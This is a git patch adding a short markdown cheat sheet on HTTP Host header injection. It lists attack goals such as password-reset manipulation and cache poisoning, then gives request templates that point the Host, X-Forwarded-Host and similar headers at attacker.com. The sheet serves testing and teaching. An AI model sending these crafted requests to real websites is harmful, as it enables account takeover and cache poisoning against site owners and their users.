From c57b44509079d0f29c11ffa9630789a6c792cbcd Mon Sep 17 00:00:00 2001 From: Mehdi Date: Mon, 30 Oct 2023 11:41:53 +0330 Subject: [PATCH] Create Host Header Injection.md --- Host Header Injection.md | 58 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 Host Header Injection.md diff --git a/Host Header Injection.md b/Host Header Injection.md new file mode 100644 index 0000000..551eb39 --- /dev/null +++ b/Host Header Injection.md @@ -0,0 +1,58 @@ +# Host Header Injection +HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. + +### attacker can supply invalid input to cause the web server to: +* Dispatch requests to the first virtual host on the list. +* Perform a redirect to an attacker-controlled domain. +* Perform web cache poisoning. +* Manipulate password reset functionality. +* Allow access to virtual hosts that were not intended to be externally accessible. + +## How to exploit +* Change the host header +```html +GET /example HTTP/1.1 +Host: attacker.com +... +``` +* Duplicating the host header +```html +GET /example HTTP/1.1 +Host: vulnerable-website.com +Host: attacker.com +... +``` +* Add line wrapping +```html +GET /example HTTP/1.1 + Host: vulnerable-website.com +Host: attacker.com +... +``` +* Add host override headers +```html +X-Forwarded-For: attacker.com +X-Forwarded-Host: attacker.com +X-Client-IP: attacker.com +X-Remote-IP: attacker.com +X-Remote-Addr: attacker.com +X-Host: attacker.com +Forwarded: attacker.com + +# How to use? In this case im using "X-Forwarded-For : attacker.com" +GET /example HTTP/1.1 +Host: vulnerable-website.com +X-Forwarded-For : attacker.com +... + +# Supply an absolute URL +GET https://vulnerable-website.com/ HTTP/1.1 +Host: attacker.com +... +``` + + + + + +